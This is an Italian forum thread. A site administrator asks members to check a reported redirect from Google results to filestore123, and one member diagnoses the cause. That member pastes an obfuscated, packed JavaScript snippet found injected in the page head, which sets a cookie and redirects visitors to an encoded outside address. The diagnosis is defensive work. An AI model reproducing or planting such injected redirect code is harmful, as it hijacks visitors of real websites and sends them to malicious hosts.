Test su Google

mariomaggi

Well-known member
Ciao a tutti.
Un utente mi segnala: "da qualche tempo ho notato che c'è' uno strano sito che sovrasta il vostro. Cioè quando clicchi su google energeticambiente.it esce un altro sito sovrapposto: filestoreecceccxxxxxxxxxxxx
Sembra che succeda solo la prima volta".

A me non succede, qualcuno puo' verificare e rispondere qui, grazie?

Ciao
Mario
 
A me capita in continuazione.... si cerca su google, si trova la discussione/il post, si clicca.... e viene fuori filestore123.
Nessuna traccia dell'indirizzo che avevo selezionato... torno indietro con la freccia, riclicco e viene fuori quello giusto.
 
idem a cio che accade a living...firefox linux...
non accade sempre solitamente quando non si è loggati a EA
ed alla prima ricerca forse poi si registra l ip della ricerca...
comunque reindirizza verso filestore123.....
a leggere in rete potrebbe essere un problema dovuto a banner/immagini avatar del sito
che NON devono avere i permessi di eseguire scripting...
qui cio che puo servire al vostro webmaster...
Google redirecting to filestore123.info - vBulletin SEO Forums
non è a causa di vbseo (che avete anche voi...da aggiornare hehe)
ma forse di file php mascherati da banner/gif/avatar firme con foto ecc ecc....
occhio che a detta di altri master il sistema tende anche a diminuire il
livello di visite del forum...non è da prendere sottogamba.. :bye1:

gnorri...
 
risultato di firebug
HTML:
var vbsp='289675C3';eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('l a=["\\C\\e\\c\\m\\b\\D\\e","\\j\\e\\c\\m\\b\\D\\e","\\E\\u\\e\\I\\f\\b\\o\\e\\j\\h","\\c\\d\\F\\H\\m\\M\\c\\o\\b\\i\\C","\\w\\d\\d\\K\\b\\e","\\h","\\E\\u\\f\\q\\c\\r\\h\\k","\\L\\N\\j\\f","\\A","\\p\\d\\w\\q\\c\\b\\d\\i","\\r\\c\\c\\f\\G\\k\\k\\y\\b\\p\\e\\j\\c\\d\\o\\e\\A\\W\\O\\t\\b\\i\\y\\d\\k\\n\\d\\T\\i\\p\\d\\q\\n\\t\\f\\r\\f\\P\\b\\n\\h"];Q z(B,s){l g=R S();g[a[1]](g[a[0]]()+V);l v=a[2]+g[a[3]]();x[a[4]]=B+a[5]+s+v+a[6]};z(a[7],a[8]);x[a[9]]=a[J]+U;',59,59,'||||||||||_0x3da8|x69|x74|x6F|x65|x70|_0x2d8dx4|x3D|x6E|x73|x2F|var|x54|x64|x72|x6C|x61|x68|_0x2d8dx3|x2E|x20|_0x2d8dx5|x63|document|x66|ipbcc|x31|_0x2d8dx2|x67|x6D|x3B|x47|x3A|x4D|x78|10|x6B|x76|x53|x62|x33|x3F|function|new|Date|x77|vbsp|86400000|x32'.split('|'),0,{}))
cè voluto un po ma ho trovato il vermetto....:rolleyes:
var vbsp='289675C3' nell head in uno script della pagina

@mariomaggi per far si che si ripresenti il problema è sufficiente
rimuovere i coockie che vengono salvati fare una ricerca in google
energeticambiente e cliccare su una delle sottosezioni che vengono
fornite da google tipo fotovoltaico....
e si viene reindirizzati a filestore123
per risolvere invece cè bisogno del vostro webmaster...
i consigli del link precedente dovrebbero essere di aiuto...

gnorri
 
Ultima modifica:
Indietro
Top